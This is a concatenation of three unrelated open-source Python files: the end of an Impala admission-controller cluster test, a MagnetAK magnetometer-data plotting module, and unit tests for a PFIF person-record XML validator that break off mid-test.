num_queries - metric_deltas['admitted'] - metric_deltas['queued']
initial_metric_deltas = metric_deltas
while len(self.executing_threads) > 0:
curr_metrics = self.get_admission_metrics();
log_metrics("Main loop, curr_metrics: ", curr_metrics);
num_to_cancel = len(self.executing_threads)
LOG.debug("Main loop, will cancel %s queries", num_to_cancel)
self.cancel_admitted_queries(num_to_cancel)
self.wait_for_metric_changes(['completed'], curr_metrics, num_to_cancel)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(['admitted'], curr_metrics,
expected_admitted)
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few heartbeats to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_heartbeats(4)
final_metrics = self.get_admission_metrics();
log_metrics("Final metrics: ", final_metrics, logging.INFO);
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics,
final_metrics.keys())
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(MAX_NUM_CONCURRENT_QUERIES,
MAX_NUM_QUEUED_QUERIES, -1),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
self.pool_name = 'default-pool'
self.run_admission_test(vector, {'request_pool': self.pool_name})
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(MAX_NUM_CONCURRENT_QUERIES * 100,
MAX_NUM_QUEUED_QUERIES, MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (MEM_TEST_LIMIT / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
|
|
"""
Copyright 2014 Google Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Chris Riederer
# Google, Inc
# 2014-08-26
"""Plotting module for MagnetAK, the Magnetometer Android toolKit"""
import magnetak_util
import pylab as pl
import numpy as np
TRUE_COLOR = 'green'
INPUT_COLOR = 'red'
def PlotData(runData, optPlotData=False, inputLabels=[]):
"""Plots the data from a run"""
pl.figure()
pl.title(runData['systemInfo']['Build.MODEL'] + " " + runData['filename'])
magData = np.array(runData['magnetometer'])
magDomain = magData[:,0] # first index is time, second is accuracy
accuracyData = magData[:,1]
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
# pl.scatter(magDomain, X, color='red')
# pl.scatter(magDomain, Y, color='blue')
# pl.scatter(magDomain, Z, color='green')
# pl.scatter(magDomain, mag, color='black')
pl.plot(magDomain, X, color='red')
pl.plot(magDomain, Y, color='blue')
pl.plot(magDomain, Z, color='green')
pl.plot(magDomain, mag, color='black')
pl.xlabel("Time (ns)") # show axes labels
pl.ylabel("Magnetometer Data ($\mu$T)")
pl.legend(["X","Y","Z","Magnitude"], loc="lower left")
accuracyColors = ['red','blue','green','black']
if optPlotData:
for index in xrange(1,len(accuracyData)-1):
if accuracyData[index] != accuracyData[index-1]:
pl.scatter(magDomain[index], 0,
color=accuracyColors[int(accuracyData[index])])
if 'labels' in runData.keys() and len(runData['labels']):
labelTime = np.array(runData['labels'])[:,0]
for t in labelTime:
pl.axvline(t, color=TRUE_COLOR)
for inputLabel in inputLabels:
pl.axvline(inputLabel, color=INPUT_COLOR)
def format_coord(x, y): # let us see the full time coordinate in the display
return 'x=%16f, y=%16f' % (x / 1e6, y)
ax = pl.gca()
ax.format_coord = format_coord
def PlotList(runDataList, optPlotData=True):
"""In separate figures, plot the data for each run"""
for runData in runDataList:
PlotData(runData, optPlotData=optPlotData)
pl.show() # shows all the plots from above
def PlotFeatures(runDataList):
"""Plot X,Y,Z and magnitude of snippet in separate plots"""
f, axarr = pl.subplots(2, 4, sharex=True)
for runData in runDataList:
SubPlotFeature(runData, axarr)
positives = [rd for rd in runDataList if len(rd['labels']) > 0]
negatives = [rd for rd in runDataList if len(rd['labels']) == 0]
xp, yp, zp, mp = magnetak_util.CreateTemplates(positives)
newT = range(0,450000000,1000000)
axarr[0, 0].plot(newT, [xp(t) for t in newT], color='red')
axarr[0, 1].plot(newT, [yp(t) for t in newT], color='red')
axarr[0, 2].plot(newT, [zp(t) for t in newT], color='red')
axarr[0, 3].plot(newT, [mp(t) for t in newT], color='red')
xp, yp, zp, mp = magnetak_util.CreateTemplates(negatives)
newT = range(0,450000000,1000000)
axarr[1, 0].plot(newT, [xp(t) for t in newT], color='red')
axarr[1, 1].plot(newT, [yp(t) for t in newT], color='red')
axarr[1, 2].plot(newT, [zp(t) for t in newT], color='red')
axarr[1, 3].plot(newT, [mp(t) for t in newT], color='red')
pl.show()
def SubPlotFeature(runData, axarr):
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize based on the first row
# magData = magData - magData[-1,:] # normalize based on the last value
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
magDomain = magDomain - magDomain[0] # put in same timescale
X = magnetak_util.scale(X)
Y = magnetak_util.scale(Y)
Z = magnetak_util.scale(Z)
mag = magnetak_util.scale(mag)
row = 0 if len(runData['labels']) > 0 else 1
axarr[row, 0].plot(magDomain, X, alpha=0.2)
axarr[row, 1].plot(magDomain, Y, alpha=0.2)
axarr[row, 2].plot(magDomain, Z, alpha=0.2)
axarr[row, 3].plot(magDomain, mag, alpha=0.2)
if row == 0:
axarr[row, 0].set_ylabel('True Positive')
axarr[row, 0].set_title('X')
axarr[row, 1].set_title('Y')
axarr[row, 2].set_title('Z')
axarr[row, 3].set_title('Magnitude')
else:
axarr[row, 0].set_ylabel('True Negative')
axarr[row, 0].set_ylim(axarr[0, 0].get_ylim())
axarr[row, 1].set_ylim(axarr[0, 1].get_ylim())
axarr[row, 2].set_ylim(axarr[0, 2].get_ylim())
axarr[row, 3].set_ylim(axarr[0, 3].get_ylim())
def PlotSnip(runData):
"""Plot magnitude of snippet in the same plot,
red if positive, blue otherwise
"""
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize data based on first row
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
magDomain = magDomain - magDomain[0] # put in same timemagnetak_util.scale
color = 'blue' if len(runData['labels']) > 0 else 'red'
pl.plot(magDomain, mag, color=color, alpha=0.1)
def PlotSnips(runDataList):
pl.figure()
pl.title("Snips")
for s in runDataList:
PlotSnip(s)
pl.show()
def PlotInterpolatedSnips(runDataList):
fcns = []
for runData in runDataList:
if len(runData['labels']) == 0:
continue
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize data based on first row
# magData = magData - magData[-1,:] # normalize data based on last row
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
magDomain = magDomain - magDomain[0] # put in same timescale
mag = magnetak_util.scale(mag)
fcns.append(scipy.interpolate.interp1d(magDomain, mag, kind='cubic'))
pl.plot(magDomain, mag, alpha=0.2)
numFcns = float(len(fcns))
BigF = lambda x: sum([f(x) for f in fcns]) / numFcns
newX = range(0,450000000,1000000)
newY = [BigF(x) for x in newX]
pl.plot(newX, newY, color='red')
def PlotFeatureHistograms(snipList, featurizer, featureIndex=0, samePlot=True):
"""Plots two histograms of features, one for positive examples and one for
negative examples. This is used to help engineer good features."""
positives = [rd for rd in snipList if len(rd['labels']) > 0]
negatives = [rd for rd in snipList if len(rd['labels']) == 0]
pos_features = np.array([featurizer.featurize(rd['magnetometer']) for rd in positives])
neg_features = np.array([featurizer.featurize(rd['magnetometer']) for rd in negatives])
if samePlot:
n, bins, patches = pl.hist(pos_features[:,featureIndex], color='red', alpha=0.4)
pl.hist(neg_features[:,featureIndex], color='blue', bins=bins, alpha=0.4)
pl.show()
else:
pl.figure()
pl.title("Positive examples feature distribution")
pl.hist(pos_features[:,featureIndex], color='red')
pl.figure()
pl.title("Negative examples feature distribution")
pl.hist(neg_features[:,featureIndex], color='blue')
pl.show()
def PlotThresholds(runData, T1=30, T2=130, segment_size=200):
pl.figure()
pl.title(runData['systemInfo']['Build.MODEL'] + " " + runData['filename'] + " Thresholds")
data = np.array(runData['magnetometer'])
domain = data[:,0] # first index is time, second is accuracy
# domain = domain * 1e9
min_seg1 = []
max_seg2 = []
segment_time_ns = segment_size * 1e6
window_size = segment_time_ns * 2
newDomain = domain[domain > domain[0] + window_size]
newDomain = map(long, newDomain)
for sensorTime in newDomain:
segment1 = data[(domain > sensorTime - window_size) & (domain <= sensorTime - segment_time_ns)]
segment2 = data[(domain > sensorTime - segment_time_ns) & (domain <= sensorTime)]
# For each window, calculate the baseline.
# Get the baseline S0, the last value before we start the segmentation.
S0 = segment2[-1, 2:5]
offsets1 = segment1[:, 2:5] - S0
offsets2 = segment2[:, 2:5] - S0
norms1 = [np.linalg.norm(row) for row in offsets1]
norms2 = [np.linalg.norm(row) for row in offsets2]
min_seg1.append(min(norms1))
max_seg2.append(max(norms2))
# Plot the thresholds.
pl.plot(newDomain, min_seg1, color='red')
pl.plot(newDomain, max_seg2, color='blue')
pl.plot(newDomain, np.ones(len(newDomain)) * T1, color='#aadddd') # Minimum must be lower
pl.plot(newDomain, np.ones(len(newDomain)) * T2, color='#ddaadd') # Maximum must be higher
pl.show()
|
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pfif_validator.py"""
import unittest
from StringIO import StringIO
import os
import sys
from pfif_validator import PfifValidator
import pfif_validator # to test main
import datetime
import utils
from utils import Message
import tests.pfif_xml as PfifXml
class ValidatorTests(unittest.TestCase):
"""Tests each validation function in pfif_validator.py"""
EXPIRED_TIME = datetime.datetime(1999, 3, 1)
PRINT_VALIDATOR_OUTPUT = True
# Set Up
def setUp(self): # pylint: disable=C0103
"""Some of the tests will run code that prints stuff out. This prevents it
from printing next to the clean dots from the unit tests."""
if not ValidatorTests.PRINT_VALIDATOR_OUTPUT:
sys.stdout = open(os.devnull, "w")
@staticmethod
def set_up_validator(xml):
"""Creates a PFIF validator from XML"""
pfif_file = StringIO(xml)
return PfifValidator(pfif_file)
# printing
def test_printing(self):
"""Tests that each of the printing options in set_printing_options changes
the behavior of print_errors"""
# set up the messages to be printed; the XML file here will not be used for
# any tests. It's just to get the validator initialized properly.
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
lines = []
for i in range(1, 12):
lines.append('ZZZ ' + str(i))
messages = []
messages.append(Message("Message 1", is_error=True, xml_line_number=11,
xml_text="Text", person_record_id="Person",
note_record_id="Note"))
messages.append(Message("Message 2", is_error=False))
messages.append(Message("Message 3"))
# With no errors or warnings, nothing should print
output = validator.validator_messages_to_str(messages, show_errors=False,
show_warnings=False)
self.assertEqual(len(output), 0)
# with only errors on, only errors should print
output = validator.validator_messages_to_str(messages, show_warnings=False,
show_line_numbers=False,
show_record_ids=False,
show_xml_text=False,
show_full_line=False)
self.assertNotEqual(output.find("Message 1"), -1)
self.assertEqual(output.find("Message 2"), -1)
# the default value of is_error should be True, so Message 3 should print
self.assertNotEqual(output.find("Message 3"), -1)
# with warnings on, warnings should print
output = validator.validator_messages_to_str(
messages, show_line_numbers=False, show_record_ids=False,
show_xml_text=False, show_full_line=False)
self.assertNotEqual(output.find("Message 2"), -1)
# line numbers, xml text, and record IDs should not print with them off and
# should print with them on
self.assertEqual(output.find("11"), -1)
output = validator.validator_messages_to_str(
messages, show_line_numbers=True, show_record_ids=False,
show_xml_text=False, show_full_line=False)
self.assertNotEqual(output.find("11"), -1)
self.assertEqual(output.find("Text"), -1)
output = validator.validator_messages_to_str(
messages, show_record_ids=False, show_xml_text=True,
show_full_line=False)
self.assertNotEqual(output.find("Text"), -1)
self.assertEqual(output.find("Person"), -1)
self.assertEqual(output.find("Note"), -1)
output = validator.validator_messages_to_str(
messages, show_record_ids=True, show_full_line=False)
self.assertNotEqual(output.find("Person"), -1)
self.assertNotEqual(output.find("Note"), -1)
self.assertEqual(output.find("ZZZ 11"), -1)
output = validator.validator_messages_to_str(
messages, show_full_line=True, xml_lines=lines)
self.assertNotEqual(output.find("ZZZ 11"), -1)
# is_html should output a div somewhere
self.assertEqual(output.find("div"), -1)
output = validator.validator_messages_to_str(
messages, is_html=True, xml_lines=lines)
self.assertNotEqual(output.find("div"), -1)
# validate_root_has_child
def test_root_has_child(self):
"""validate_root_has_child should return an empty list if the root node has
at least one child"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_root_has_child()), 0)
def test_root_lacks_child(self):
"""validate_root_has_child should return a list with a message if the root
node does not have at least one child"""
validator = self.set_up_validator(PfifXml.XML_ROOT_LACKS_CHILD)
self.assertNotEqual(len(validator.validate_root_has_child()), 0)
# validate_root_has_mandatory_children
def test_root_has_mandatory_children(self):
"""validate_root_has_mandatory_children should return an empty list if one
of the children is a person"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_root_has_mandatory_children()), 0)
def test_root_lacks_mandatory_children(self):
"""validate_root_has_mandatory_children should return a list with a message
if the only children are not notes or persons"""
validator = self.set_up_validator(PfifXml.XML_ROOT_HAS_BAD_CHILD)
self.assertNotEqual(
len(validator.validate_root_has_mandatory_children()), 0)
def test_root_has_note_child_11(self):
"""validate_root_has_mandatory_children should return a list with a message
if the only children are notes and the version is 1.1"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_11)
self.assertNotEqual(
len(validator.validate_root_has_mandatory_children()), 0)
def test_root_has_note_child_12(self):
"""validate_root_has_mandatory_children should return an empty list if the
only children are notes and the version is greater than 1.1"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_12)
self.assertEqual(len(validator.validate_root_has_mandatory_children()), 0)
# validate_has_mandatory_children
def test_note_has_mandatory_children(self):
"""validate_has_mandatory_children should return an empty list if it is
given notes with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_NOTES_WITH_CHILDREN)
self.assertEqual(len(validator.validate_note_has_mandatory_children()), 0)
def test_note_has_no_mandatory_children(self):
"""validate_has_mandatory_children should return a list with nine missing
children when given one child of a person with no children and one top level
note (which also must have a person_record_id) with no children."""
validator = self.set_up_validator(PfifXml.XML_NOTES_NO_CHILDREN)
self.assertEqual(len(validator.validate_note_has_mandatory_children()), 9)
def test_person_has_mandatory_children_11(self):
"""validate_has_mandatory_children should return an empty list if it is
given a version 1.1 person with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_WITH_CHILDREN_11)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 0)
def test_person_has_mandatory_children_13(self):
"""validate_has_mandatory_children should return an empty list if it is
given a version 1.3 person with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_WITH_CHILDREN_13)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 0)
def test_person_has_no_mandatory_children_11(self):
"""validate_has_mandatory_children should return a list with three missing
children when given a version 1.1 person with no children"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 3)
def test_person_has_no_mandatory_children_13(self):
"""validate_has_mandatory_children should return a list with three missing
children when given a version 1.3 person with no children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_NO_CHILDREN_13)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 3)
# validate_fields_have_correct_format
def test_no_fields_exist(self):
"""validate_fields_have_correct_format should return an empty list when
passed a tree with no subelements of person or note because no nodes are
improperly formatted."""
validator = self.set_up_validator(PfifXml.XML_PERSON_NO_CHILDREN_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
validator = self.set_up_validator(PfifXml.XML_NOTES_NO_CHILDREN)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_all_11_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
passed a tree with all 1.1 elements in the correct formats."""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
#TODO(samking): test that non-ascii characters should be rejected
def test_no_11_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
subnode of person and note when every such subnode is of an incorrect
format. This tests all fields in version 1.1 for which incorrect input is
possible."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_11)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 23)
def test_all_12_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
presented with a document where all fields have the correct format. This
tests all fields introduced or changed in 1.2; it does not test fields that
were unchanged from 1.1."""
validator = self.set_up_validator(PfifXml.XML_FULL_12)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_no_12_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
element presented to it when all fields have an incorrect format. This
tests all fields introduced or changed in 1.2, except ones that are always
accepted; it does not test fields that were unchanged from 1.1."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_12)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 12)
def test_all_13_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
presented with a document where all fields have the correct format. This
tests all fields introduced or changed in 1.3; it does not test fields that
were unchanged from 1.1 and 1.2."""
validator = self.set_up_validator(PfifXml.XML_CORRECT_FORMAT_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_no_13_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
element presented to it when all fields have an incorrect format. This
tests all fields introduced or changed in 1.3, except ones that are always
accepted; it does not test fields that were unchanged from 1.1 and 1.2."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 1)
# validate_unique_id
def test_person_ids_are_unique(self):
"""validate_person_ids_are_unique should return an empty list when all
person ids are unique"""
validator = self.set_up_validator(PfifXml.XML_UNIQUE_PERSON_IDS)
self.assertEqual(len(validator.validate_person_ids_are_unique()), 0)
def test_note_ids_are_unique(self):
"""validate_note_ids_are_unique should return an empty list when all note
ids are unique"""
validator = self.set_up_validator(PfifXml.XML_UNIQUE_NOTE_IDS)
self.assertEqual(len(validator.validate_note_ids_are_unique()), 0)
def test_person_ids_are_not_unique(self):
"""validate_person_ids_are_unique should return a list with all non-unique
person ids when there are non-unique person ids"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_PERSON_IDS)
self.assertEqual(len(validator.validate_person_ids_are_unique()), 2)
def test_note_ids_are_not_unique(self):
"""validate_person_ids_are_unique should return a list with all non-unique
note ids when there are non-unique note ids"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_NOTE_IDS)
self.assertEqual(len(validator.validate_note_ids_are_unique()), 2)
# validate_notes_belong_to_persons
def test_notes_belong_to_people(self):
"""validate_notes_belong_to_persons should return an empty list if all top
level notes have a person_record_id and all notes inside persons have no
person_record_id or the same person_record_id as the person."""
validator = self.set_up_validator(PfifXml.XML_NOTES_BELONG_TO_PEOPLE)
self.assertEqual(len(validator.validate_notes_belong_to_persons()), 0)
def test_notes_do_not_belong_to_people(self):
"""validate_notes_belong_to_persons should return a list with all top level
notes without a person_record_id and person_record_ids for notes that are
under a person with a person_record_id that doesn't match the person"""
validator = self.set_up_validator(PfifXml.XML_NOTES_WITHOUT_PEOPLE)
self.assertEqual(len(validator.validate_notes_belong_to_persons()), 2)
# validate_field_order
def test_correct_field_order_11(self):
"""validate_person_field_order and validate_note_field_order should return
a empty lists if all elements in all persons and notes are in the correct
order"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_omitting_fields_is_okay_11(self):
"""validate_person_field_order and validate_note_field_order should return
a empty lists if all elements in all persons and notes are in the correct
order, even if some elements are omitted (ie, 1,2,4 is in order even though
3 is omitted)"""
validator = self.set_up_validator(PfifXml.XML_MISSING_FIELDS_11)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_incorrect_field_order_11(self):
"""validate_person_field_order and validate_note_field_order should return
the first element in every person and note that are out of order"""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FIELD_ORDER_11)
self.assertEqual(len(validator.validate_person_field_order()), 3)
self.assertEqual(len(validator.validate_note_field_order()), 2)
def test_nonexistent_field(self):
"""validate_person_field_order and validate_note_field_order should ignore
any fields that are not in the spec"""
validator = self.set_up_validator(PfifXml.XML_EXTRANEOUS_FIELD_11)
self.assertEqual(len(validator.validate_person_field_order()), 0)
def test_correct_field_order_12(self):
"""validate_person_field_order and validate_note_field_order should return
a empty lists if person_record_id comes first and any notes come last in
persons and if note_record_id and person_record_id come first in notes."""
validator = self.set_up_validator(PfifXml.XML_CORRECT_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_incorrect_person_field_order_12(self):
"""validate_person_field_order should return a list with one entry for every
person that does not have notes at the end or that does not have its
person_record_id at the start"""
validator = self.set_up_validator(
PfifXml.XML_INCORRECT_PERSON_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_person_field_order()), 3)
def test_incorrect_note_field_order_12(self):
"""validate_note_field_order should return a list with one entry for every
note that does not have note_record_id and person_record_id at the start"""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_NOTE_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_note_field_order()), 4)
def test_field_order_does_not_matter_13(self):
"""validate_person_field_order and validate_note_field_order should return
an empty list if the version is greater than 1.2 because order doesn't
matter"""
validator = self.set_up_validator(PfifXml.XML_ODD_ORDER_13)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
# validate_expiry
def test_unexpired_records(self):
"""validate_expired_records_removed should return an empty list when no
records are expired"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_DATA_NONSYNCED_DATES)
not_expired_1998 = datetime.datetime(1998, 11, 1, 1, 1, 1, 1)
utils.set_utcnow_for_test(not_expired_1998)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
just_not_expired = datetime.datetime(1999, 2, 4, 4, 5, 5, 0)
utils.set_utcnow_for_test(just_not_expired)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_empty_data(self):
"""validate_expired_records_removed should return an empty list when all
expired records have empty fields instead of real data"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_EMPTY_DATA)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_omissions(self):
"""validate_expired_records_removed should return an empty list when all
expired records omit fields instead of exposing real data"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_NO_DATA)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_unremoved_data(self):
"""validate_expired_records_removed should return a list with the
person_record_ids of all expired records that have data that should be
removed"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_NOTE_SYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
just_expired = datetime.datetime(1999, 2, 4, 4, 5, 7)
utils.set_utcnow_for_test(just_expired)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_DATA_SYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
def test_expired_records_with_unremoved_top_level_note(self):
"""validate_expired_records_removed should return a list with messages for
each expired record that still had a note referring to its
person_record_id"""
validator = (
self.set_up_validator(PfifXml.XML_EXPIRE_99_HAS_NOTE_DATA))
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
def test_expiration_placeholder_with_bad_source_entry_date(self):
"""validate_expired_records_removed should return a list with the
person_record_ids of all expired records whose source_date and entry_date
are not the same value and are not created within a day after expiration"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_NO_DATA_NONSYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 2)
def test_no_expiration_before_13(self):
"""validate_expired_records_removed should return an empty list when the
version is before 1.3"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_12)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_no_expiration_without_date(self):
"""validate_expired_records_removed should return an empty list when the
there isn't an expiry_date"""
validator = self.set_up_validator(PfifXml.XML_NO_EXPIRY_DATE)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
validator = self.set_up_validator(PfifXml.XML_EMPTY_EXPIRY_DATE)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
# validate_linked_person_records_are_matched
def test_unlinked_records(self):
"""validate_linked_records_matched should return an empty list when
evaluating unlinked persons"""
validator = self.set_up_validator(PfifXml.XML_UNLINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 0)
def test_correctly_linked_records(self):
"""validate_linked_records_matched should return an empty list when
evaluating two persons that each have notes with linked_person_record_ids
pointing at each other"""
validator = self.set_up_validator(PfifXml.XML_CORRECTLY_LINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 0)
def test_asymmetrically_linked_records(self):
"""validate_linked_records_matched should return a list with each
note_record_id that has a linked_person_record_id that is not matched"""
validator = self.set_up_validator(PfifXml.XML_ASYMMETRICALLY_LINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 1)
# validate_extraneous_fields
def test_no_extra_fields(self):
"""validate_extraneous_fields should return an empty list when presented
with a list that only includes fields in the PFIF spec"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_extraneous_fields()), 0)
def test_gibberish_fields(self):
"""validate_extraneous_fields should return a list with every field that is
not defined anywhere in the PFIF spec. This includes fields defined in PFIF
1.3 when using a 1.2 document."""
validator = self.set_up_validator(PfifXml.XML_GIBBERISH_FIELDS)
self.assertEqual(len(validator.validate_extraneous_fields()), 5)
def test_duplicate_fields(self):
"""validate_extraneous_fields should return a list with every duplicated
field (except for multiple <pfif:note> fields in one <pfif:person> or fields
that are not at the same place in the tree, such as a note and a person with
a person_record_id or two different notes)"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_FIELDS)
self.assertEqual(len(validator.validate_extraneous_fields()), 3)
def test_top_level_note_11(self):
"""validate_extraneous_fields should return a list with every top level note
in a PFIF 1.1 document"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_PERSON_11)
